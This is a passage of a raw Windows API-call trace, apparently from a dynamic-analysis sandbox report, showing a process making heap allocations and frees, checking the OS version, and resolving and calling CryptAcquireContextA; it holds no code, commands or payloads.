Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.101] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.102] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0161.102] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0161.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.104] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0161.104] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.105] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.105] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.106] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.106] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0161.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.110] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.111] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0161.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.111] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 